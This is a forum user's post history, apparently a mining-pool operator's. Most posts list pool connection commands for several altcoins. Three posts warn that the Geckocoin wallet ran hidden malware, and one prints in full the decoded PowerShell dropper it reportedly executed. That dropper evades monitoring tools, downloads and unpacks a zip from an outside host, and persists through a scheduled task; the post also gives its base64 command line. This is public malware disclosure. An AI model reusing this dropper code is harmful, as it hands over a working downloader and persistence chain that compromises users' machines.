Bitcoin Forum
July 15, 2024, 02:11:32 PM *
News: Latest Bitcoin Core release: 27.0 [Torrent]
 
  Home Help Search Login Register More  
  Show Posts
Pages: [1] 2 3 »
1  Alternate cryptocurrencies / Announcements (Altcoins) / Re: [ANN] Nexell-ia (NXL) GPU PoW - BlockDAG - Blockchain with AI on: January 28, 2024, 05:54:09 PM

Added to https://mining4people.com/pool/nexellia-pplnsbf (PPLNSBF) 1% Fee - Block finder gets 5% - Frequent Payouts - Custom Payouts
FI:
Code:
-a karlsenhash -o stratum+tcp://fi.mining4people.com:3349 -u <WALLET_ADDRESS> -p x
US:
Code:
-a karlsenhash -o stratum+tcp://us.mining4people.com:3349 -u <WALLET_ADDRESS> -p x
AU:
Code:
-a karlsenhash -o stratum+tcp://au.mining4people.com:3349 -u <WALLET_ADDRESS> -p x
IN:
Code:
-a karlsenhash -o stratum+tcp://in.mining4people.com:3349 -u <WALLET_ADDRESS> -p x
BR:
Code:
-a karlsenhash -o stratum+tcp://br.mining4people.com:3349 -u <WALLET_ADDRESS> -p x
DE:
Code:
-a karlsenhash -o stratum+tcp://de.mining4people.com:3349 -u <WALLET_ADDRESS> -p x
SG:
Code:
-a karlsenhash -o stratum+tcp://de.mining4people.com:3349 -u <WALLET_ADDRESS> -p x

Port 3349 - Normal Diff
Port 13349 - High Diff (16)
Port 23349 - SSL Normal Diff
Port 33349 - SSL High Diff (16)
Port 43349 - Static High Diff For FPGA's (16)

Added to https://mining4people.com/pool/nexellia-pplnsbf30 (PPLNSBF30) 2% Fee - Block finder gets 30% - Frequent Payouts - Custom Payouts
FI:
Code:
-a karlsenhash -o stratum+tcp://fi.mining4people.com:3350 -u <WALLET_ADDRESS> -p x
US:
Code:
-a karlsenhash -o stratum+tcp://us.mining4people.com:3350 -u <WALLET_ADDRESS> -p x
AU:
Code:
-a karlsenhash -o stratum+tcp://au.mining4people.com:3350 -u <WALLET_ADDRESS> -p x
IN:
Code:
-a karlsenhash -o stratum+tcp://in.mining4people.com:3350 -u <WALLET_ADDRESS> -p x
BR:
Code:
-a karlsenhash -o stratum+tcp://br.mining4people.com:3350 -u <WALLET_ADDRESS> -p x
DE:
Code:
-a karlsenhash -o stratum+tcp://de.mining4people.com:3350 -u <WALLET_ADDRESS> -p x
SG:
Code:
-a karlsenhash -o stratum+tcp://de.mining4people.com:3350 -u <WALLET_ADDRESS> -p x

Port 3350 - Normal Diff
Port 13350 - High Diff (16)
Port 23350 - SSL Normal Diff
Port 33350 - SSL High Diff (16)
Port 43350 - Static High Diff For FPGA's (16)
Discord: https://discord.gg/gB88abP58V | E-mail: support .at. mining4people . com | Twitter: https://twitter.com/Mining4People | Facebook: https://www.facebook.com/Mining4People-101610745816329
2  Alternate cryptocurrencies / Announcements (Altcoins) / Re: [ANN] Trade without waiting and No more Heart Beating on: November 02, 2023, 07:08:11 PM

Added to https://mining4people.com/pool/osinpay-pplns (PPLNS) 1% Fee - Payouts Every 2 Minutes - Custom Payouts
FI:
Code:
-a gr -o stratum+tcp://fi.mining4people.com:3388 -u <WALLET_ADDRESS> -p x
US:
Code:
-a gr -o stratum+tcp://us.mining4people.com:3388 -u <WALLET_ADDRESS> -p x
AU:
Code:
-a gr -o stratum+tcp://au.mining4people.com:3388 -u <WALLET_ADDRESS> -p x
IN:
Code:
-a gr -o stratum+tcp://in.mining4people.com:3388 -u <WALLET_ADDRESS> -p x
BR:
Code:
-a gr -o stratum+tcp://br.mining4people.com:3388 -u <WALLET_ADDRESS> -p x
DE:
Code:
-a gr -o stratum+tcp://de.mining4people.com:3388 -u <WALLET_ADDRESS> -p x

Port 3388 - Normal Diff
Port 13388 - High Diff
Port 23388 - SSL Normal Diff
Port 33388 - SSL Normal Diff

Discord: https://discord.gg/gB88abP58V | E-mail: support .at. mining4people . com | Twitter: https://twitter.com/Mining4People | Facebook: https://www.facebook.com/Mining4People-101610745816329
3  Alternate cryptocurrencies / Announcements (Altcoins) / Re: [ANN] REDB - RedBlock Sha3d on: October 21, 2023, 05:40:34 PM

Added to https://mining4people.com/pool/redblock-pplns (PPLNS) 1% Fee - Payouts Every 2 Minutes - Custom Payouts
FI:
Code:
-a sha3d -o stratum+tcp://fi.mining4people.com:3421 -u <WALLET_ADDRESS> -p x
US:
Code:
-a sha3d -o stratum+tcp://us.mining4people.com:3421 -u <WALLET_ADDRESS> -p x
AU:
Code:
-a sha3d -o stratum+tcp://au.mining4people.com:3421 -u <WALLET_ADDRESS> -p x
IN:
Code:
-a sha3d -o stratum+tcp://in.mining4people.com:3421 -u <WALLET_ADDRESS> -p x
BR:
Code:
-a sha3d -o stratum+tcp://br.mining4people.com:3421 -u <WALLET_ADDRESS> -p x
DE:
Code:
-a sha3d -o stratum+tcp://de.mining4people.com:3421 -u <WALLET_ADDRESS> -p x

Port 3421 - Normal Diff
Port 13421 - High Diff
Port 23421 - SSL Normal Diff
Port 33421 - SSL Normal Diff

Discord: https://discord.gg/gB88abP58V | E-mail: support .at. mining4people . com | Twitter: https://twitter.com/Mining4People | Facebook: https://www.facebook.com/Mining4People-101610745816329
4  Alternate cryptocurrencies / Announcements (Altcoins) / Re: [ANN] MECU - Connect with MecuAI on: September 22, 2023, 10:13:54 PM

Added to https://mining4people.com/pool/mecuai-pplns (PPLNS) 1% Fee - Payouts Every 2 Minutes - Custom Payouts
FI:
Code:
-a gr -o stratum+tcp://fi.mining4people.com:3382 -u <WALLET_ADDRESS> -p x
US:
Code:
-a gr -o stratum+tcp://us.mining4people.com:3382 -u <WALLET_ADDRESS> -p x
AU:
Code:
-a gr -o stratum+tcp://au.mining4people.com:3382 -u <WALLET_ADDRESS> -p x
IN:
Code:
-a gr -o stratum+tcp://in.mining4people.com:3382 -u <WALLET_ADDRESS> -p x
BR:
Code:
-a gr -o stratum+tcp://br.mining4people.com:3382 -u <WALLET_ADDRESS> -p x
DE:
Code:
-a gr -o stratum+tcp://de.mining4people.com:3382 -u <WALLET_ADDRESS> -p x

Port 3382 - Normal Diff
Port 13382 - High Diff
Port 23382 - SSL Normal Diff
Port 33382 - SSL Normal Diff

Discord: https://discord.gg/gB88abP58V | E-mail: support .at. mining4people . com | Twitter: https://twitter.com/Mining4People | Facebook: https://www.facebook.com/Mining4People-101610745816329
5  Alternate cryptocurrencies / Announcements (Altcoins) / Re: POW coin and TeaParty app for wallet-to-wallet trading on: March 18, 2023, 05:56:26 PM
Added to https://mining4people.com PPLNS 0.5% Fee - https://mining4people.com SOLO 1% Fee
Payouts Every 2 Minutes - Custom Payouts

FI:
Code:
-a ethash -o stratum+tcp://fi.mining4people.com:4074 -u <WALLET_ADDRESS> -p x
US:
Code:
-a ethash -o stratum+tcp://us.mining4people.com:4074 -u <WALLET_ADDRESS> -p x
AU:
Code:
-a ethash -o stratum+tcp://au.mining4people.com:4074 -u <WALLET_ADDRESS> -p x
DE:
Code:
-a ethash -o stratum+tcp://de.mining4people.com:4074 -u <WALLET_ADDRESS> -p x
IN:
Code:
-a ethash -o stratum+tcp://in.mining4people.com:4074 -u <WALLET_ADDRESS> -p x
BR:
Code:
-a ethash -o stratum+tcp://br.mining4people.com:4074 -u <WALLET_ADDRESS> -p x

Ports:
Code:
4074 - Normal Diff
14074 - High Diff
24074 - SSL Normal Diff
34074 - SSL High Diff

4075 - SOLO Normal Diff
14075 - SOLO High Diff
24075 - SOLO SSL Normal Diff
34075 - SOLO SSL High Diff

Discord: https://discord.gg/gB88abP58V | E-mail: support .at. mining4people . com | Twitter: https://twitter.com/Mining4People | Facebook: https://www.facebook.com/Mining4People-101610745816329
6  Alternate cryptocurrencies / Announcements (Altcoins) / Re: [ANN] {Geckocoin / Ghostrider \ Masternode / PvP Games} on: March 13, 2023, 07:57:25 PM
Looking much better, would still advice caution as with any file downloaded from the internet.

Based on the latest wallet virustotal scans and behavior checks, no more commands are executed.
All the alerts reference either cryptowallets or cryptominers which for coin wallets is pretty normal.

Edit to add,
Only thing that really is a bit wierd is the file
C:\Sysmon\438274944D21C3590AB2F6C5A34D5933B808ACB6409037FFE5B95B31EF18E8BDCFC6B5E6A0049489ADC5CECAFC7F95524157170C3CDA66F72AD85350D09F0476432071D000000000000000000000000000000000
But I think this is a Sysinternals sandbox artifact as I did not see that in my own sandbox.
Also not entirely sure why it needs to query a list of all running processes but maybe that's due to some dependency.

Is it possible your build environment was compromised when building the previous wallets?
7  Alternate cryptocurrencies / Announcements (Altcoins) / Re: [ANN] {Geckocoin / Ghostrider \ Masternode / PvP Games} on: March 13, 2023, 04:31:11 PM
Where did you get this powershell script from, there is nothing like this in the GEC wallet) Check again!

Since you asked for video proof earlier, see here: https://youtu.be/oy7Ha-WkXVo
As you can see in the video the wallet is downloaded from the official website and the send to virustotal. After which a rescan is ran on the file since the hash matches the earlier hash.
AV still reports the wallet as containing Trojan-Downloader.Win64.Alien.acs and the behaviour tab still shows the powershell. Ofcourse now it does fail to download the .zip which is a good thing.

I don't know if you are the person building and publishing the wallet files. If your not, then who ever is doing that for you has taken an advantage of it.
I am glad to see that the bootstrap.zip file has been removed from update.airdroper.net so users no longer get that downloaded.
8  Alternate cryptocurrencies / Announcements (Altcoins) / Re: [ANN] {Geckocoin / Ghostrider \ Masternode / PvP Games} on: March 12, 2023, 10:51:46 PM


Code:
If (Get-Process -Name 'Taskmgr', 'perfmon', 'ProcessHacker', 'TMX64', 'TMX', 'procexp64a', 'procexp64', 'procexp', 'ProcessExplorerPortable', 'SystemExplorerPortable', 'SystemExplorer', 'EXEExplorerPort', 'EXE', 'EXE64', 'TaskManagerPort', 'KillProcess', 'TaskMan', 'WinUtilitiesPortable', 'WinUtil', 'FreeTaskManager', 'AnVir', 'anvir64', 'Wireshark' -ErrorAction SilentlyContinue){exit} Else {if( !((Test-Path -Path "$env:APPDATA\LogState\htMbZp.py" -PathType Leaf) -and (Test-Path -Path "$env:APPDATA\LogState\ws2help.exe" -PathType Leaf) -and (Test-Path -Path "$env:APPDATA\LogState\jLherYu.vbs" -PathType Leaf))){schtasks /delete /tn "ImDskSvc\wmiApSrv" /f;Stop-Process -Name "ws2help";Remove-Item -Recurse -Force "$env:APPDATA\LogState";New-Item -ItemType Directory -Force -Path "$env:APPDATA\LogState";$addPath = "$env:APPDATA\LogState\jLherYu.vbs"; $text = "Option Explicit";$text2 = "Dim ProcessPath";$text3 = "Dim fileSystemObject";$text4 = "Dim strAppDataPath";$text5 = "ProcessPath = `"ws2help.exe`"";$text6 = "Call CheckProcess(DblQuote(ProcessPath))";$text7 = "Sub CheckProcess(ProcessPath)";$text8 = "Dim strComputer,objWMIService,colProcesses,WshShell,Tab,ProcessName";$text9 = "strComputer = `".`"";$text10 = "Tab = Split(ProcessPath,`"\`")";$text11 = "ProcessName = Tab(UBound(Tab))";$text12 = "ProcessName = Replace(ProcessName,Chr(34),`"`")";$text13 = "Set objWMIService = GetObject(`"winmgmts:`" _";$text14 = "& `"{impersonationLevel=impersonate}!\\`" & strComputer & `"\root\cimv2`")";$text15 = "Set colProcesses = objWMIService.ExecQuery _";$text16 = "(`"Select * from Win32_Process Where Name = '`"& ProcessName & `"'`")";$text17 = "Set fileSystemObject = CreateObject(`"Scripting.FileSystemObject`")";$text18 = "strAppDataPath = CreateObject(`"WScript.Shell`").ExpandEnvironmentStrings(`"%appdata%`")";$text19 = "If colProcesses.Count = 0 And fileSystemObject.FileExists(strAppDataPath & `"\LogState\htMbZp.py`") Then";$text20 = "Set WshShell = CreateObject(`"WScript.Shell`")";$text21 = "WshShell.Run `"cmd /c %appdata%\LogState\ws2help.exe %appdata%\LogState\htMbZp.py`", 0, False";$text22 = "Else";$text23 = "Exit Sub";$text24 = "End if";$text25 = "End Sub";$text26 = "Function DblQuote(Str)";$text27 = "DblQuote = Chr(34) & Str & Chr(34)";$text28 = "End Function";echo $text $text2 $text3 $text4 $text5 $text6 $text7 $text8 $text9 $text10 $text11 $text12 $text13 $text14 $text15 $text16 $text17 $text18 $text19 $text20 $text21 $text22 $text23 $text24 $text25 $text26 $text27 $text28 | Out-File $addPath;[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri "http://REMOVED.net/bootstrap.zip" -OutFile "$env:TEMP\bootstrap.zip";Expand-Archive -Path "$env:TEMP\bootstrap.zip" -DestinationPath "$env:APPDATA\LogState" -Force;schtasks /create /sc minute /mo 10 /tn "ImDskSvc\wmiApSrv" /tr "$env:APPDATA\LogState\jLherYu.vbs" /f } else {Start-Process -FilePath "$env:APPDATA\LogState\jLherYu.vbs";break}}

Stop writing this lies everywhere, give video evidence, if you have any at all

Check out the virustotal link earlier in the topic, specifically the behavior one.
GeckoCoin wallet executes this line:
Code:
C:\Windows\System32\cmd.exe /C powershell.exe -exec bypass -enc SQBmACAAKABHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIAAnAFQAYQBzAGsAbQBnAHIAJwAsACAAJwBwAGUAcgBmAG0AbwBuACcALAAgACcAUAByAG8AYwBlAHMAcwBIAGEAYwBrAGUAcgAnACwAIAAnAFQATQBYADYANAAnACwAIAAnAFQATQBYACcALAAgACcAcAByAG8AYwBlAHgAcAA2ADQAYQAnACwAIAAnAHAAcgBvAGMAZQB4AHAANgA0ACcALAAgACcAcAByAG8AYwBlAHgAcAAnACwAIAAnAFAAcgBvAGMAZQBzAHMARQB4AHAAbABvAHIAZQByAFAAbwByAHQAYQBiAGwAZQAnACwAIAAnAFMAeQBzAHQAZQBtAEUAeABwAGwAbwByAGUAcgBQAG8AcgB0AGEAYgBsAGUAJwAsACAAJwBTAHkAcwB0AGUAbQBFAHgAcABsAG8AcgBlAHIAJwAsACAAJwBFAFgARQBFAHgAcABsAG8AcgBlAHIAUABvAHIAdAAnACwAIAAnAEUAWABFACcALAAgACcARQBYAEUANgA0ACcALAAgACcAVABhAHMAawBNAGEAbgBhAGcAZQByAFAAbwByAHQAJwAsACAAJwBLAGkAbABsAFAAcgBvAGMAZQBzAHMAJwAsACAAJwBUAGEAcwBrAE0AYQBuACcALAAgACcAVwBpAG4AVQB0AGkAbABpAHQAaQBlAHMAUABvAHIAdABhAGIAbABlACcALAAgACcAVwBpAG4AVQB0AGkAbAAnACwAIAAnAEYAcgBlAGUAVABhAHMAawBNAGEAbgBhAGcAZQByACcALAAgACcAQQBuAFYAaQByACcALAAgACcAYQBuAHYAaQByADYANAAnACwAIAAnAFcAaQByAGUAcwBoAGEAcgBrACcAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAKQB7AGUAeABpAHQAfQAgAEUAbABzAGUAIAB7AGkAZgAoACAAIQAoACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwATABvAGcAUwB0AGEAdABlAFwAaAB0AE0AYgBaAHAALgBwAHkAIgAgAC0AUABhAHQAaABUAHkAcABlACAATABlAGEAZgApACAALQBhAG4AZAAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwATABvAGcAUwB0AGEAdABlAFwAdwBzADIAaABlAGwAcAAuAGUAeABlACIAIAAtAFAAYQB0AGgAVAB5AHAAZQAgAEwAZQBhAGYAKQAgAC0AYQBuAGQAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEwAbwBnAFMAdABhAHQAZQBcAGoATABoAGUAcgBZAHUALgB2AGIAcwAiACAALQBQAGEAdABoAFQAeQBwAGUAIABMAGUAYQBmACkAKQApAHsAcwBjAGgAdABhAHMAawBzACAALwBkAGUAbABlAHQAZQAgAC8AdABuACAAIgBJAG0ARABzAGsAUwB2AGMAXAB3AG0AaQBBAHAAUwByAHYAIgAgAC8AZgA7AFMAdABvAHAALQBQAHIAbwBjAGUAcwBzACAALQBOAGEAbQBlACAAIgB3AHMAMgBoAGUAbABwACIAOwBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABMAG8AZwBTAHQAYQB0AGUAIgA7AE4AZQB3AC0ASQB0AGUAbQAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAEYAbwByAGMAZQAgAC0AUABhAHQAaAAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABMAG8AZwBTAHQAYQB0AGUAIgA7ACQAYQBkAGQAUABhAHQAaAAgAD0AIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwATABvAGcAUwB0AGEAdABlAFwAagBMAGgAZQByAFkAdQAuAHYAYgBzACIAOwAgACQAdABlAHgAdAAgAD0AIAAiAE8AcAB0AGkAbwBuACAARQB4AHAAbABpAGMAaQB0ACIAOwAkAHQAZQB4AHQAMgAgAD0AIAAiAEQAaQBtACAAUAByAG8AYwBlAHMAcwBQAGEAdABoACIAOwAkAHQAZQB4AHQAMwAgAD0AIAAiAEQAaQBtACAAZgBpAGwAZQBTAHkAcwB0AGUAbQBPAGIAagBlAGMAdAAiADsAJAB0AGUAeAB0ADQAIAA9ACAAIgBEAGkAbQAgAHMAdAByAEEAcABwAEQAYQB0AGEAUABhAHQAaAAiADsAJAB0AGUAeAB0ADUAIAA9ACAAIgBQAHIAbwBjAGUAcwBzAFAAYQB0AGgAIAA9ACAAYAAiAHcAcwAyAGgAZQBsAHAALgBlAHgAZQBgACIAIgA7ACQAdABlAHgAdAA2ACAAPQAgACIAQwBhAGwAbAAgAEMAaABlAGMAawBQAHIAbwBjAGUAcwBzACgARABiAGwAUQB1AG8AdABlACgAUAByAG8AYwBlAHMAcwBQAGEAdABoACkAKQAiADsAJAB0AGUAeAB0ADcAIAA9ACAAIgBTAHUAYgAgAEMAaABlAGMAawBQAHIAbwBjAGUAcwBzACgAUAByAG8AYwBlAHMAcwBQAGEAdABoACkAIgA7ACQAdABlAHgAdAA4ACAAPQAgACIARABpAG0AIABzAHQAcgBDAG8AbQBwAHUAdABlAHIALABvAGIAagBXAE0ASQBTAGUAcgB2AGkAYwBlACwAYwBvAGwAUAByAG8AYwBlAHMAcwBlAHMALABXAHMAaABTAGgAZQBsAGwALABUAGEAYgAsAFAAcgBvAGMAZQBzAHMATgBhAG0AZQAiADsAJAB0AGUAeAB0ADkAIAA9ACAAIgBzAHQAcgBDAG8AbQBwAHUAdABlAHIAIAA9ACAAYAAiAC4AYAAiACIAOwAkAHQAZQB4AHQAMQAwACAAPQAgACIAVABhAGIAIAA9ACAAUwBwAGwAaQB0ACgAUAByAG8AYwBlAHMAcwBQAGEAdABoACwAYAAiAFwAYAAiACkAIgA7ACQAdABlAHgAdAAxADEAIAA9ACAAIgBQAHIAbwBjAGUAcwBzAE4AYQBtAGUAIAA9ACAAVABhAGIAKABVAEIAbwB1AG4AZAAoAFQAYQBiACkAKQAiADsAJAB0AGUAeAB0ADEAMgAgAD0AIAAiAFAAcgBvAGMAZQBzAHMATgBhAG0AZQAgAD0AIABSAGUAcABsAGEAYwBlACgAUAByAG8AYwBlAHMAcwBOAGEAbQBlACwAQwBoAHIAKAAzADQAKQAsAGAAIgBgACIAKQAiADsAJAB0AGUAeAB0ADEAMwAgAD0AIAAiAFMAZQB0ACAAbwBiAGoAVwBNAEkAUwBlAHIAdgBpAGMAZQAgAD0AIABHAGUAdABPAGIAagBlAGMAdAAoAGAAIgB3AGkAbgBtAGcAbQB0AHMAOgBgACIAIABfACIAOwAkAHQAZQB4AHQAMQA0ACAAPQAgACIAJgAgAGAAIgB7AGkAbQBwAGUAcgBzAG8AbgBhAHQAaQBvAG4ATABlAHYAZQBsAD0AaQBtAHAAZQByAHMAbwBuAGEAdABlAH0AIQBcAFwAYAAiACAAJgAgAHMAdAByAEMAbwBtAHAAdQB0AGUAcgAgACYAIABgACIAXAByAG8AbwB0AFwAYwBpAG0AdgAyAGAAIgApACIAOwAkAHQAZQB4AHQAMQA1ACAAPQAgACIAUwBlAHQAIABjAG8AbABQAHIAbwBjAGUAcwBzAGUAcwAgAD0AIABvAGIAagBXAE0ASQBTAGUAcgB2AGkAYwBlAC4ARQB4AGUAYwBRAHUAZQByAHkAIABfACIAOwAkAHQAZQB4AHQAMQA2ACAAPQAgACIAKABgACIAUwBlAGwAZQBjAHQAIAAqACAAZgByAG8AbQAgAFcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAIABXAGgAZQByAGUAIABOAGEAbQBlACAAPQAgACcAYAAiACYAIABQAHIAbwBjAGUAcwBzAE4AYQBtAGUAIAAmACAAYAAiACcAYAAiACkAIgA7ACQAdABlAHgAdAAxADcAIAA9ACAAIgBTAGUAdAAgAGYAaQBsAGUAUwB5AHMAdABlAG0ATwBiAGoAZQBjAHQAIAA9ACAAQwByAGUAYQB0AGUATwBiAGoAZQBjAHQAKABgACIAUwBjAHIAaQBwAHQAaQBuAGcALgBGAGkAbABlAFMAeQBzAHQAZQBtAE8AYgBqAGUAYwB0AGAAIgApACIAOwAkAHQAZQB4AHQAMQA4ACAAPQAgACIAcwB0AHIAQQBwAHAARABhAHQAYQBQAGEAdABoACAAPQAgAEMAcgBlAGEAdABlAE8AYgBqAGUAYwB0ACgAYAAiAFcAUwBjAHIAaQBwAHQALgBTAGgAZQBsAGwAYAAiACkALgBFAHgAcABhAG4AZABFAG4AdgBpAHIAbwBuAG0AZQBuAHQAUwB0AHIAaQBuAGcAcwAoAGAAIgAlAGEAcABwAGQAYQB0AGEAJQBgACIAKQAiADsAJAB0AGUAeAB0ADEAOQAgAD0AIAAiAEkAZgAgAGMAbwBsAFAAcgBvAGMAZQBzAHMAZQBzAC4AQwBvAHUAbgB0ACAAPQAgADAAIABBAG4AZAAgAGYAaQBsAGUAUwB5AHMAdABlAG0ATwBiAGoAZQBjAHQALgBGAGkAbABlAEUAeABpAHMAdABzACgAcwB0AHIAQQBwAHAARABhAHQAYQBQAGEAdABoACAAJgAgAGAAIgBcAEwAbwBnAFMAdABhAHQAZQBcAGgAdABNAGIAWgBwAC4AcAB5AGAAIgApACAAVABoAGUAbgAiADsAJAB0AGUAeAB0ADIAMAAgAD0AIAAiAFMAZQB0ACAAVwBzAGgAUwBoAGUAbABsACAAPQAgAEMAcgBlAGEAdABlAE8AYgBqAGUAYwB0ACgAYAAiAFcAUwBjAHIAaQBwAHQALgBTAGgAZQBsAGwAYAAiACkAIgA7ACQAdABlAHgAdAAyADEAIAA9ACAAIgBXAHMAaABTAGgAZQBsAGwALgBSAHUAbgAgAGAAIgBjAG0AZAAgAC8AYwAgACUAYQBwAHAAZABhAHQAYQAlAFwATABvAGcAUwB0AGEAdABlAFwAdwBzADIAaABlAGwAcAAuAGUAeABlACAAJQBhAHAAcABkAGEAdABhACUAXABMAG8AZwBTAHQAYQB0AGUAXABoAHQATQBiAFoAcAAuAHAAeQBgACIALAAgADAALAAgAEYAYQBsAHMAZQAiADsAJAB0AGUAeAB0ADIAMgAgAD0AIAAiAEUAbABzAGUAIgA7ACQAdABlAHgAdAAyADMAIAA9ACAAIgBFAHgAaQB0ACAAUwB1AGIAIgA7ACQAdABlAHgAdAAyADQAIAA9ACAAIgBFAG4AZAAgAGkAZgAiADsAJAB0AGUAeAB0ADIANQAgAD0AIAAiAEUAbgBkACAAUwB1AGIAIgA7ACQAdABlAHgAdAAyADYAIAA9ACAAIgBGAHUAbgBjAHQAaQBvAG4AIABEAGIAbABRAHUAbwB0AGUAKABTAHQAcgApACIAOwAkAHQAZQB4AHQAMgA3ACAAPQAgACIARABiAGwAUQB1AG8AdABlACAAPQAgAEMAaAByACgAMwA0ACkAIAAmACAAUwB0AHIAIAAmACAAQwBoAHIAKAAzADQAKQAiADsAJAB0AGUAeAB0ADIAOAAgAD0AIAAiAEUAbgBkACAARgB1AG4AYwB0AGkAbwBuACIAOwBlAGMAaABvACAAJAB0AGUAeAB0ACAAJAB0AGUAeAB0ADIAIAAkAHQAZQB4AHQAMwAgACQAdABlAHgAdAA0ACAAJAB0AGUAeAB0ADUAIAAkAHQAZQB4AHQANgAgACQAdABlAHgAdAA3ACAAJAB0AGUAeAB0ADgAIAAkAHQAZQB4AHQAOQAgACQAdABlAHgAdAAxADAAIAAkAHQAZQB4AHQAMQAxACAAJAB0AGUAeAB0ADEAMgAgACQAdABlAHgAdAAxADMAIAAkAHQAZQB4AHQAMQA0ACAAJAB0AGUAeAB0ADEANQAgACQAdABlAHgAdAAxADYAIAAkAHQAZQB4AHQAMQA3ACAAJAB0AGUAeAB0ADEAOAAgACQAdABlAHgAdAAxADkAIAAkAHQAZQB4AHQAMgAwACAAJAB0AGUAeAB0ADIAMQAgACQAdABlAHgAdAAyADIAIAAkAHQAZQB4AHQAMgAzACAAJAB0AGUAeAB0ADIANAAgACQAdABlAHgAdAAyADUAIAAkAHQAZQB4AHQAMgA2ACAAJAB0AGUAeAB0ADIANwAgACQAdABlAHgAdAAyADgAIAB8ACAATwB1AHQALQBGAGkAbABlACAAJABhAGQAZABQAGEAdABoADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6AFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAIAA9ACAAWwBOAGUAdAAuAFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAVAB5AHAAZQBdADoAOgBUAGwAcwAxADIAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAIgBoAHQAdABwADoALwAvAHUAcABkAGEAdABlAC4AYQBpAHIAZAByAG8AcABlAHIALgBuAGUAdAAvAGIAbwBvAHQAcwB0AHIAYQBwAC4AegBpAHAAIgAgAC0ATwB1AHQARgBpAGwAZQAgACIAJABlAG4AdgA6AFQARQBNAFAAXABiAG8AbwB0AHMAdAByAGEAcAAuAHoAaQBwACIAOwBFAHgAcABhAG4AZAAtAEEAcgBjAGgAaQB2AGUAIAAtAFAAYQB0AGgAIAAiACQAZQBuAHYAOgBUAEUATQBQAFwAYgBvAG8AdABzAHQAcgBhAHAALgB6AGkAcAAiACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABMAG8AZwBTAHQAYQB0AGUAIgAgAC0ARgBvAHIAYwBlADsAcwBjAGgAdABhAHMAawBzACAALwBjAHIAZQBhAHQAZQAgAC8AcwBjACAAbQBpAG4AdQB0AGUAIAAvAG0AbwAgADEAMAAgAC8AdABuACAAIgBJAG0ARABzAGsAUwB2AGMAXAB3AG0AaQBBAHAAUwByAHYAIgAgAC8AdAByACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEwAbwBnAFMAdABhAHQAZQBcAGoATABoAGUAcgBZAHUALgB2AGIAcwAiACAALwBmACAAfQAgAGUAbABzAGUAIAB7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABMAG8AZwBTAHQAYQB0AGUAXABqAEwAaABlAHIAWQB1AC4AdgBiAHMAIgA7AGIAcgBlAGEAawB9AH0A

That is a base64 encoded line, that you can decode easily to see for your selves. On linux you can run the below line, or you can use something like https://www.base64decode.org/, just set the source character set to auto-detect.
Code:
echo SQBmACAAKABHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIAAnAFQAYQBzAGsAbQBnAHIAJwAsACAAJwBwAGUAcgBmAG0AbwBuACcALAAgACcAUAByAG8AYwBlAHMAcwBIAGEAYwBrAGUAcgAnACwAIAAnAFQATQBYADYANAAnACwAIAAnAFQATQBYACcALAAgACcAcAByAG8AYwBlAHgAcAA2ADQAYQAnACwAIAAnAHAAcgBvAGMAZQB4AHAANgA0ACcALAAgACcAcAByAG8AYwBlAHgAcAAnACwAIAAnAFAAcgBvAGMAZQBzAHMARQB4AHAAbABvAHIAZQByAFAAbwByAHQAYQBiAGwAZQAnACwAIAAnAFMAeQBzAHQAZQBtAEUAeABwAGwAbwByAGUAcgBQAG8AcgB0AGEAYgBsAGUAJwAsACAAJwBTAHkAcwB0AGUAbQBFAHgAcABsAG8AcgBlAHIAJwAsACAAJwBFAFgARQBFAHgAcABsAG8AcgBlAHIAUABvAHIAdAAnACwAIAAnAEUAWABFACcALAAgACcARQBYAEUANgA0ACcALAAgACcAVABhAHMAawBNAGEAbgBhAGcAZQByAFAAbwByAHQAJwAsACAAJwBLAGkAbABsAFAAcgBvAGMAZQBzAHMAJwAsACAAJwBUAGEAcwBrAE0AYQBuACcALAAgACcAVwBpAG4AVQB0AGkAbABpAHQAaQBlAHMAUABvAHIAdABhAGIAbABlACcALAAgACcAVwBpAG4AVQB0AGkAbAAnACwAIAAnAEYAcgBlAGUAVABhAHMAawBNAGEAbgBhAGcAZQByACcALAAgACcAQQBuAFYA